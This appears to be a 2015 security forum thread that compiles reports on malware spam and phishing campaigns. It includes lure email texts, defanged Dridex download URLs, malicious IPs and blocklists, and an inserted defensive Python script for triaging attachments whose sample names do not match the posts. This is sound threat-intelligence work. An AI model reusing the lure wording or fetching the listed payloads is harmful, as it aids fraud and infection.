Current Virus total detections: 9/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/44336ed2ab436a4192c23174b9ebde2bb852fff77d123c60f504e1ec3320191e/analysis/1432226961/
___
Exploit kits delivering Necurs
- https://isc.sans.edu/diary.html?storyid=19719
2015-05-21 - "In the past few days, we've seen Nuclear and Angler exploit kits (EKs) delivering -malware- identified as Necurs... Necurs is a type of malware that opens a back door on the infected computer [1]. It may also disable antivirus products as well as download additional malware [1][2]... I saw Necurs as a malware payload from Nuclear and Angler EKs last week... In each case, traffic went through a gate on 185.14.30.218 (between the compromised website and the EK landing page). We ran across Nuclear EK delivering Necurs again on 2015-05-20. In this example, the gate was on 91.121.63.249..."
(More detail at the isc URL above.)
[1] https://www.symantec.com/security_response/writeup.jsp?docid=2012-121212-2802-99
[2] https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Necurs
185.14.30.218: https://www.virustotal.com/en/ip-address/185.14.30.218/information/
91.121.63.249: https://www.virustotal.com/en/ip-address/91.121.63.249/information/
___
“Facebook Recovery” accounts share Phishing link, offer Tech Support
- https://blog.malwarebytes.org/fraud-scam/2015/05/facebook-recovery-accounts-share-phishing-link-offer-tech-support/
May 21, 2015 - "We’ve seen a certain j.mp -shortened- URL being shared by what we believe are -rogue- (if not compromised) accounts within Facebook a couple of days ago. In the below sample we recovered, the URL in question is part of a message from another account called “Facebook recovery” — a truly -fake- one... that is up to the task of notifying users that their accounts have been reported for abuse and will likely be disabled if they don’t act on the notice ASAP:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/facebook-recovery-spam-post.png
The URL, of course, hides the below phishing page:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/facebook-phishing-page-default.png
The blurb on the page is the same as the spammed message on Facebook. Once a user enters the credentials asked for and clicks Log In, data is posted to recovery.php, and then users are -redirected- to this payment page, which asks for their full name, credit card details, and billing address:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/facebook-phishing-payment.png
We have no idea why all of a sudden the account that claims to be a legitimate entity from Facebook is asking for a form of monetary compensation for the recovery of accounts. Perhaps that is what the phishers meant when they said “help us do more for security and convenience for everyone”. We have looked at the stats for the j.mp URL and found that it didn’t yield that many clicks from the time of its creation up to the present... It’s highly likely that the URL is not shared during these days, making it less visible than your average malicious URL. Less visibility also means that potentially fewer companies would be able to block it due to flying under the radar. VT results for the j.mp URL show this*.
* https://www.virustotal.com/en/url/b5e13af6d3f7ae90d5989b9c857299549db23180113b121dc676a48e467126e4/analysis/1432202719/
Furthermore, the majority of clicks are mostly from Asian countries and the United States:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/clicks-per-country.png
We did a simple search on Facebook for accounts that may contain the string “Facebook recovery”. To date, we found more than 40... If you see posts on your feed that appear similar to the Facebook post we discussed here, whether it continues to bear the same URL or not, it’s best to -ignore- it and warn your network about an on-going -spam- campaign."
recovery-page-php .zz .mu: 185.28.21.145: https://www.virustotal.com/en/ip-address/185.28.21.145/information/
___
"Logjam"...
- https://blog.malwarebytes.org/security-threat/2015/05/the-logjam-attack-what-you-need-to-know/
May 20, 2015 - "... Dubbed as Logjam, the vulnerability affects home users -and- corporations alike, and over 80,000 of the top one million domains worldwide were found to be vulnerable. The original report on Logjam can be found here:
- https://weakdh.org/
... While much of the research is performed against a Diffie-Hellman 512-bit key group, the researchers behind the Logjam discovery also speculate that 1024-bit groups could be vulnerable to those with “nation-state” resources, making a suggestion that groups like the NSA might have already accomplished this... . A comprehensive look at all of their research can be found here:
- https://weakdh.org/imperfect-forward-secrecy.pdf
... At the time of this writing, patches are still in the works for all the major web browsers, including Chrome, Firefox, Safari, and Internet Explorer. They should be released in the next day or two, so ensure your browser updates correctly once it's released. These updates should reject Diffie-Hellman key lengths that are less than 1024 bits..."
Also see:
- https://isc.sans.edu/diary.html?storyid=19717
2015-05-20
AplusWebMaster
2015-05-22, 14:19
FYI...
Fake 'Australian Tax' SPAM – PDF malware
- http://myonlinesecurity.co.uk/australian-taxation-office-remittance-advisory-email-fake-pdf-malware/
22 May 2015 - "'Australian Taxation Office – Remittance Advisory Email' pretending to come from Australian Taxation Office <noreply@ ato .gov .au> with a link to download a zip file is another one from the current bot runs... The bots seem to be getting very confused today and are mixing up Lloyds Bank with Australian Taxation Office and even using a date 1 year in the past. Nobody should fall for these. The links in the emails currently are set to download from:
- https ://storage-ec2-13.sharefile .com/download.ashx?dt=dt8fdfcdfa200a4b01b93e2643fa61fcc1&h=xw9ZAT0fvavEwl7uRL2DX3xEJcw6II19IbZfNyN1ix0%3d
Update: we are now seeing several different sharefile .com download links. All appear to be the same malware, regardless of the link. The same set of download links are being spammed out in other emails from the same bot net with subjects of 'You’ve received a new fax' appearing to come from fax@ your own domain and 'Internal ONLY' pretending to come from Administrator@ your own domain both alleging to contain a fax message. The email looks like:
Monday 22 May 2014
This is a Remitter Advice following the submission of a payment instruction by Lloyds Bank Plc. Please review the details of the payment here.
Lloyds Banking Group plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC95000. Telephone: 0131 225 4555. Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales no. 2065. Telephone 0207626 1500. Bank of Scotland plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC327000. Telephone: 08457 21 31 41. Cheltenham & Gloucester plc. Registered Office: Barnett Way, Gloucester GL4 3RL. Registered in England and Wales 2299428. Telephone: 0845 603 1637
Lloyds Bank plc, Bank of Scotland plc are authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and Prudential Regulation Authority.
Cheltenham & Gloucester plc is authorised and regulated by the Financial Conduct Authority.
Halifax is a division of Bank of Scotland plc. Cheltenham & Gloucester Savings is a division of Lloyds Bank plc.
HBOS plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC218813...
22 May 2015 : FAX_82QPL932UN_771.zip: Extracts to: FAX_82QPL932UN_771.scr
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a84ff4f02527bf60135c46f88935b84a245c6b3c1d52485547e7a1a92ded5505/analysis/1432286982/
storage-ec2-13.sharefile .com: 54.84.9.118: https://www.virustotal.com/en/ip-address/54.84.9.118/information/
- http://blog.dynamoo.com/2015/05/malware-spam-this-is-remitter-advice.html
22 May 2015
"... Recommended blocklist:
209.15.197.235
217.23.194.237 "
___
Fake 'Invoice IN278577' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-invoice-in278577-from-out-of-eden-word-doc-or-excel-xls-spreadsheet-malware/
22 May 2015 - "'Your Invoice IN278577 from Out of Eden' pretending to come from sales@ outofeden .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Your-Invoice-IN278577-from-Out-of-Eden.png
22 May 2015 : Invoice IN278577 (emailed 2015-05-21).doc
Current Virus total detections: 1/57*... Which downloads www .footingclub .com/85/20.exe which is a Dridex banking Trojan (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/67c9743d34f71a0cece563f93bcc0270dcd0dbe6725dee05fea4f2e7cc9cb298/analysis/1432288366/
** https://www.virustotal.com/en/file/463f5d9fd77d8a96ce3ebd41433b230ccffc1f99331d3103cf7c1c454eb50801/analysis/1432288878/
... Behavioural information
TCP connections
185.12.95.191: https://www.virustotal.com/en/ip-address/185.12.95.191/information/
2.18.213.208: https://www.virustotal.com/en/ip-address/2.18.213.208/information/
AplusWebMaster
2015-05-26, 13:05
FYI...
Fake 'Blank 11' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/blank-11-hannah-e-righton-word-doc-or-excel-xls-spreadsheet-malware/
26 May 2015 - "'Blank 11' pretending to come from hannah.e.righton@ gmail .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus... The email has a completely blank body.
26 May 2015: Blank 11.doc - Current Virus total detections: 2/57*
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/338df2f3f6dd18ed8387f80e1d79669f088d3009e11c6cd8361d41fe5a85021b/analysis/1432633538/
___
Fake 'Invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/your-invoice-ref-inv232654-from-thomsonlocal-word-doc-or-excel-xls-spreadsheet-malware/
26 May 2015 - "'Your Invoice (ref: INV232654) from thomsonlocal' pretending to come from Pleasedonotreply@ thomsonlocal .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/thomson_local_corrupt.png
... It is supposed to look like or read:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/thomson_local.png
26 May 2015: Invoice INV232654.doc - Current Virus total detections: 2/56*
... downloads the same Dridex banking malware as described in today’s other word macro malware downloaders being spammed out 'Blank 11 hannah.e.righton' – word doc or excel xls spreadsheet malware**. This particular macro version downloads from http ://crestliquors .com/73/20.exe (VirusTotal***) but all the downloads are identical, just from multiple different locations. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/862d16e4d3ae8bc6902f8afb5fc434f72017cf4e7c67fdbb8287a99ea65c43d3/analysis/1432634028/
** http://myonlinesecurity.co.uk/blank-11-hannah-e-righton-word-doc-or-excel-xls-spreadsheet-malware/
*** https://www.virustotal.com/en/file/e78f5915f825b58be7c44b55c1050a201c9f24e09d794a81810dfe995608eb85/analysis/1432631807/
File name: 20_exe
... Behavioural information
TCP connections
144.76.238.214: https://www.virustotal.com/en/ip-address/144.76.238.214/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
crestliquors .com: 64.29.151.221: https://www.virustotal.com/en/ip-address/64.29.151.221/information/
___
Fake 'Underreported Income' SPAM – PDF malware
- http://myonlinesecurity.co.uk/notice-of-underreported-income-australian-taxation-office-and-sage-outdated-invoice-fake-pdf-malware/
26 May 2015 - "'Notice of Underreported Income' pretending to come from Australian Taxation Office <noreply@ ato .gov .au> and 'Outdated Invoice' pretending to come from Sage Invoice <invoice@ sage .com> with a -link- in the body of the email to download a zip file is another one from the current bot runs... The Australian Taxation Office email looks like:
Taxpayer ID: ufwsd-000008882579UK Tax Type: Income Tax Issue: Unreported/Underreported Income (Fraud Application) Please review your tax income statement on HM Revenue and Customs ( HMRC). Download your HMRC statement. Please complete the form...
The links in these emails go to https ://a .uguu .se/hivjca_Invoice_00471200.zip (Note the HTTPS) which gives a not found message. If you drop the S and just use a standard HTTP link then you get the malware. The Sage invoice looks like:
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
https ://invoice .sage .co.uk/Account?769525=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@ sage .com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential. They are intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies...
26 May 2015: ytuads_Invoice_00471206.zip: Extracts to: Invoice_00471206.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c7819359b0317b4ad5941993d662e6ce4b405bcabe93e04dde56d045b4841b97/analysis/1432638854/
Invoice_00471203.scr
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
93.185.4.90: https://www.virustotal.com/en/ip-address/93.185.4.90/information/
66.215.30.118: https://www.virustotal.com/en/ip-address/66.215.30.118/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
uguu .se:
104.28.24.2: https://www.virustotal.com/en/ip-address/104.28.24.2/information/
104.28.25.2: https://www.virustotal.com/en/ip-address/104.28.25.2/information/
___
Fake 'Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/775-westminster-avenue-apt-d5-fw-invoice-fake-pdf-malware/
26 May 2015 - "'775 Westminster Avenue APT D5 Fw: Invoice' coming from random email addresses and names with a zip attachment is another one from the current bot runs... The email looks like:
Name: Invoice
Customer ID: 718527
Street Address
775 Westminster Avenue APT D5
Brooklyn, NY, 01748
Phone: (235) 194-2842
The customer ID number, the NY code and the phone numbers are all random and different in each email. The attachment zip names are also random but all extract to the same invoice_company.exe
26 May 2015: 030018-.zip: Extracts to: invoice_company.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d2f23f1ff7a12fb5d165953401c99d2c73845b842ef1d88794902fa7a1a481bc/analysis/1432647309/
___
Tesco – Phish ...
- http://myonlinesecurity.co.uk/collect-a-80gbp-reward-tesco-phishing/
26 May 2015 - "'Collect a 80GBP reward!' pretending to come from Tesco <postmaster@ tescoina .com>. It is the end of May, just after the bank holiday. You have spent up to your limit on the credit cards and are wondering how to pay the bills until the next pay cheque arrives, when what looks like a miracle happens. An email arrives apparently from Tesco saying Collect a 80GBP reward! that offers you £80 for filling in a Tesco customer satisfaction -survey... it is a -scam- and is a phishing fraud designed to steal your bank and credit card details... If you open the link you see a webpage looking like this: (I had to split it into 2 parts to take a screenshot):
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/Tesco-survey1.png
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/Tesco-survey2.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them..."
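The "spoofed icon" attachments reported in the posts above (a .zip whose single .exe or .scr entry carries a PDF icon, so it passes for a PDF when known extensions are hidden) can be screened before anyone opens them. This added example (not code from any of the quoted blogs) triages an in-memory zip by executable extension, by the PE 'MZ' header and by double extensions; the archive contents are constructed stand-ins, not the real samples.

```python
"""Defender-side triage of a zipped e-mail attachment (added example).

Nothing in the archive is executed: entries are only opened for their first
two bytes. Three checks are applied to every file entry:
  (a) the name ends in an extension Windows will run when double-clicked,
  (b) the content starts with the PE 'MZ' signature although the name does
      not look executable (the .scr / .exe-with-PDF-icon trick, or a renamed
      binary), and
  (c) a document-looking extension is followed by an executable one, e.g.
      'invoice.pdf.exe'.
"""
import io
import zipfile

# Directly runnable extensions (constructed list, not exhaustive). Note that
# .scr "screensavers" are ordinary PE executables.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".js", ".jse", ".vbs", ".vbe", ".wsf"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt",
                 ".jpg", ".png"}


def _exts(name):
    """All dot-extensions of a file name, lower-cased and in order:
    'Invoice.pdf.exe' -> ['.pdf', '.exe']; 'readme' -> []."""
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def triage_zip(zip_bytes):
    """Return a list of (entry_name, reason) findings for an in-memory zip.
    An empty list means these three checks saw nothing, which is not proof
    the attachment is clean."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            exts = _exts(info.filename)
            last = exts[-1] if exts else ""
            # (a) the archive hands the user a directly runnable file
            if last in EXECUTABLE_EXTS:
                findings.append((info.filename, "executable extension " + last))
            # (c) 'report.pdf.exe' style double extension
            if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and last in EXECUTABLE_EXTS:
                findings.append((info.filename, "double extension hides executable"))
            # (b) the bytes say PE executable whatever the name claims
            with zf.open(info) as fh:
                magic = fh.read(2)
            if magic == b"MZ" and last not in EXECUTABLE_EXTS:
                findings.append((info.filename, "PE header but non-executable name"))
    return findings


def build_sample_zip(entries):
    """Build a zip in memory from {name: bytes}; constructed test data only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed stand-ins named after attachments in the posts above. The bytes
# are a fake PE stub (just the 'MZ' signature plus padding), not malware.
FAKE_PE = b"MZ" + b"\x00" * 62

SAMPLE_ZIP = build_sample_zip({
    "invoice_8467_08202014.scr": FAKE_PE,   # .scr shown with a PDF icon
    "Pampered_ingredients.exe": FAKE_PE,    # .exe shown with a PDF icon
    "statement.pdf": FAKE_PE,               # PE bytes behind a .pdf name
    "recipes.pdf.exe": FAKE_PE,             # double extension
    "readme.txt": b"just text",             # benign entry
})

if __name__ == "__main__":
    for entry, reason in triage_zip(SAMPLE_ZIP):
        print(f"{entry}: {reason}")
```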
AplusWebMaster
2015-05-27, 16:11
FYI...
Fake 'INV-152307' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/anthony-alexandra-associates-may-inv-152307-gbp-418-80-lauren-braisby-reed-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
27 May 2015 - "'Anthony Alexandra Associates MAY INV-152307 GBP 418.80' pretending to come from Lauren Braisby <lauren.braisby@ reed .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Anthony-Alexandra-Associates-MAY-INV-152307-GBP-418.80.png
25 February 2015: logmein_pro_receipt.xls - Current Virus total detections: 1/57*
... which downloads Dridex banking malware from http ://wingtouch .com/776/331.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c04cc13a337103fcd1eb270a2c89ae34aee1c7c024da445bebdf1d87d8315859/analysis/1432725577/
** https://www.virustotal.com/en/file/ae06347a89bc8882ea1ad1e49d3d1bee1a84ad0bc472ffe3605a8e68f0fd8d5f/analysis/1432727693/
... Behavioural information
TCP connections
185.11.247.226: https://www.virustotal.com/en/ip-address/185.11.247.226/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
wingtouch .com: 64.29.151.221: https://www.virustotal.com/en/ip-address/64.29.151.221/information/
___
Fake 'Invoice charge' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/announce-of-importance-invoice-charge-word-doc-or-excel-xls-spreadsheet-malware/
27 May 2015 - "'Announce of importance: Invoice charge' coming from random names, companies and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hi,
Please see attached the copy of invoice from 22/05/2015.
Please can you send a revised statement so we can settle any outstanding balances.
Kind Regards,
Mason Lloyd
-Or-
Your monthly Rainbow Communications invoice is attached to this mail.
This bill is for account RT963382
Please note that for those who receive multiple reports you may need to check your attachment field on your e-mail program to ensure that you have received them all.
Louie Hood
Business Account Manager
-Or-
Good morning,
Our billing department have identified that you are getting both a hard copy and an e-mail copy of your bill. As a result you will be getting a monthly £3 hard copy fee.
Can you let me know if the hard copy can be removed?
Kind regards
Angie Ayers
Business Account Manager
27 May 2015 : F6F0_C6C7DE4EE83EDC.doc - No detections anywhere and all automatic analysis has failed. The file appears to be base 64 encoded text that I haven’t yet managed to decode and find a working content...
Update: 2nd version 25B5F_7B101029E76005.doc (VirusTotal*), so far I haven’t found a payload and the only automatic analysis hasn’t found anything... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/a400f9e424ff08c764cc98562613ea94200d438d58fa6dcb0ce545d8070d5cf5/analysis/1432729315/
File name: 25B5F_7B101029E76005.doc
Detection ratio: 0/57
___
Fake 'Statement' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/statement-from-word-doc-or-excel-xls-spreadsheet-malware/
27 May 2015 - "'Statement from [random company]' coming from random companies, names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please see attached statement.
Please be advised that our company is now incorporated and trades as DOMINO’S PIZZA GROUP PLC. Our bank is still Ulster Bank, 14 High Street, Omagh, Co. Tyrone, BT78 1BJ with new account details as follows:
Sort Code: 98-12-30
Account Number: 10991670
Ulster Bank has switched over our direct debits etc. for us so please take this letter as notification of same.
Our company number is NI624042.
DOMINO’S PIZZA GROUP PLC VAT registration number: GB184578365.
We would also like to take this opportunity to thank you for your continued support. If you should need any further information then please do not hesitate to contact us.
Regards,
Della Medina
Accounts Dept.
-Or-
Please see attached statement.
Please be advised that our company is now incorporated and trades as Cleantec Equipment Ltd. Our bank is still Ulster Bank, 14 High Street, Omagh, Co. Tyrone, BT78 1BJ with new account details as follows:
Sort Code: 98-12-30
Account Number: 10991670
Ulster Bank has switched over our direct debits etc. for us so please take this letter as notification of same.
Our company number is NI624042.
Cleantec Equipment Ltd VAT registration number: GB184578365.
We would also like to take this opportunity to thank you for your continued support. If you should need any further information then please do not hesitate to contact us.
Regards,
Dallas Dickerson
Accounts Dept.
27 May 2015: 0A15_968CD62833A4B.doc - Current Virus total detections: 0/56*
... Once again today Analysis -fails- to give any download locations. It looks like the same behaviour as today’s earlier attempt Announce of importance: Invoice charge – word doc or excel xls spreadsheet malware**... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/5bafc7c90591d2daaaa3e498a4f294f42b3230cb803abb4884d5ee50ebed8988/analysis/1432735276/
** http://myonlinesecurity.co.uk/announce-of-importance-invoice-charge-word-doc-or-excel-xls-spreadsheet-malware/
___
Chrome Lure used in Facebook Attack ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/chrome-lure-used-in-facebook-attack-despite-googles-new-policy/
May 26, 2015 - "... cybercriminals keep using Google Chrome and Facebook to infect their victims with malware... We’ve already seen both platforms be used as parts of malicious social engineering schemes. Both Google and Facebook are aware of this and have taken steps to protect their users. The number of times malicious Chrome extensions have sprouted, for example, has driven Google to restrict the use of any extension not available on the Chrome Web Store. Unfortunately, initiatives like these have not deterred cybercriminal efforts. Our findings also show that many of these platforms' users still get tricked.
Message on Facebook: Clicking the link led us to a site with a page designed to mimic the look and feel of Facebook. The page even pretends to have content from YouTube. Visiting the -malicious- site led to the automatic download of a file titled Chrome_Video_installer.scr. The filename used makes it seem that it’s a harmless Chrome browser plugin required to play videos.
Malicious page with the Facebook design: This supposed video installer file is detected as TROJ_KILIM.EFLD. This variant attempts to download another file — possibly the final payload — but the site is currently down. However, it should be noted that KILIM malware are known to be -malicious- Chrome extensions and plugins. KILIM variants have also been observed to spam Facebook messages and cause system infection... We checked the landing page and found out that the Philippines had the most number of users who visited the site, followed by those from Indonesia, India, Brazil, and the U.S... these countries are the same ones reported to have the highest percentage in terms of Facebook penetration... Given the popularity of Facebook, members of the site must be discerning when it comes to dealing with the content they come across with. -Never- click links from unknown or unverified sites, especially if the content sounds too interesting to be true. Cybercriminals often use shocking or eye-catching content to convince users to visit malicious websites. It’s far better to click links that lead to a reputable source than some random blog or site. The Trend Micro Site Safety Center* can also be used to check if websites are safe or not. The same can be said for links or attachments sent by friends. It’s worth the effort to first confirm the message before clicking the link or opening the attachment..."
* http://global.sitesafety.trendmicro.com/
:fear::fear: :mad:
AplusWebMaster
2015-05-28, 14:59
FYI...
Fake 'latest invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-latest-invoice-from-the-fuelcard-company-uk-ltd-word-doc-or-excel-xls-spreadsheet-malware/
28 May 2015 - "'Your latest invoice from The Fuelcard Company UK Ltd' pretending to come from invoicing@ fuelcards .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find your latest invoice attached.
If you have any queries please do not hesitate to contact our Customer
Service Team at invoicing@ fuelcards .co .uk
Regards
The Fuelcard Compa
28 May 2015: invoice.doc - Current Virus total detections: 2/57*
... This malicious macro downloads http ://contesafricains .com/01/59.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/3a1cd4d19bd7e366994eab61f2d6402e12d5720ca1cd29a788c9a72b51b71bfa/analysis/1432800000/
** https://www.virustotal.com/en/file/2c2a1287aeddd985e0528bb3edee04dad1e520d6fcda4920206d10b6c147ac2d/analysis/1432800544/
... Behavioural information
TCP connections
134.0.115.157: https://www.virustotal.com/en/ip-address/134.0.115.157/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
contesafricains .com: 213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
___
Fake 'Chasing delivery' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/212-b59329-23a-chasing-delivery-rachel-hopkinson-anixter-com-word-doc-or-excel-xls-spreadsheet-malware/
28 May 2015 - "'212-B59329-23A – Chasing delivery' pretending to come from Rachel.Hopkinson@ anixter .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/212-B59329-23A-Chasing-delivery.png
28 May 2015 : RR1A240D.doc - Current Virus total detections: 2/57*
... downloads http ://swiftlaw .com/01/59.exe** which is same Dridex banking malware as today’s earlier malicious word doc malspam run 'Your latest invoice from The Fuelcard Company UK Ltd – word doc or excel xls spreadsheet malware'**... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/33af46478e4d24a3c47678b846f370ac7b10c2e7588bb048d272c077e9f6c892/analysis/1432811062/
** http://myonlinesecurity.co.uk/your-latest-invoice-from-the-fuelcard-company-uk-ltd-word-doc-or-excel-xls-spreadsheet-malware/
swiftlaw .com: 216.251.32.98: https://www.virustotal.com/en/ip-address/216.251.32.98/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-01, 15:00
FYI...
Fake email SPAM - doc/xls malware attachment
- http://myonlinesecurity.co.uk/uplata-po-pon-43421-mirjana-prgomet-fokus-medical-word-doc-or-excel-xls-spreadsheet-malware/
1 Jun 2015 - "'Uplata po pon 43421' pretending to come from Mirjana Prgomet <mirjana@ fokus-medical .hr> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email has a totally -blank- body with just an attachment.
1 June 2015: report20520159260[1].doc - Current Virus total detections: 1/56*
... downloads Dridex banking malware from http ://jcmartz .com/1/09.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8561708d67dde5556aaf0d6d02d88b58ea6083801dea594263c1b4d749100f27/analysis/1433147275/
** https://www.virustotal.com/en/file/8561708d67dde5556aaf0d6d02d88b58ea6083801dea594263c1b4d749100f27/analysis/1433147275/
... Behavioural information
TCP connections
31.186.99.250: https://www.virustotal.com/en/ip-address/31.186.99.250/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
jcmartz .com: 66.175.58.9: https://www.virustotal.com/en/ip-address/66.175.58.9/information/
- http://blog.dynamoo.com/2015/06/malware-spam-uplata-po-pon-43421.html
1 Jun 2015
"... Recommended blocklist:
31.186.99.250
107.170.1.205
146.185.128.226
144.76.238.214 "
___
Fake 'slide1' SPAM - doc/xls malware attachment
- http://myonlinesecurity.co.uk/emailing-slide1-date-mon-01-jun-2015-143647-0200-simon-harrington-word-doc-or-excel-xls-spreadsheet-malware/
1 Jun 2015 - "'Emailing: slide1 Date: Mon, 01 Jun 2015 14:36:47 +0200' pretending to come from Simon Harrington <simonharrington@ talktalk .net> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/Emailing-slide1.png
1 Jun 2015 : slide1.doc - Current Virus total detections: 2/56*
... which connects to and downloads http ://216.22.14.37/~congafx/1/09.exe which is an updated Dridex banking malware (VirusTotal**)... It is using the same file name as today’s earlier malspam run but is a totally different file size Uplata po pon 43421 -Mirjana Prgomet – fokus-medical – word doc or excel xls spreadsheet malware***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/27f42ab0e59ad92ead7582df0a842a5d8dfb62adf9fd16fc673afa0b279e2323/analysis/1433162360/
** https://www.virustotal.com/en/file/43e4634222b015de08c1e820365ae48eeaea0f1a9f187db1d7b91cc79c55ab09/analysis/
*** http://myonlinesecurity.co.uk/uplata-po-pon-43421-mirjana-prgomet-fokus-medical-word-doc-or-excel-xls-spreadsheet-malware/
216.22.14.37: https://www.virustotal.com/en/ip-address/216.22.14.37/information/
- http://blog.dynamoo.com/2015/06/malware-spam-simonharringtontalktalknet.html
1 Jun 2015
"... Recommended blocklist:
31.186.99.250
107.170.1.205
146.185.128.226
144.76.238.214 ..."
___
Fake 'Order confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/order-confirmation-300-2015001469-word-doc-or-excel-xls-spreadsheet-malware/
1 Jun 2015 - "'Order confirmation 300-2015001469' with no apparent -from- address or -sender- & a -blank- empty body that is addressed to:
To: <p.pichler@ allfi .com<randomname>@ Your email domain> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email has a completely blank body.
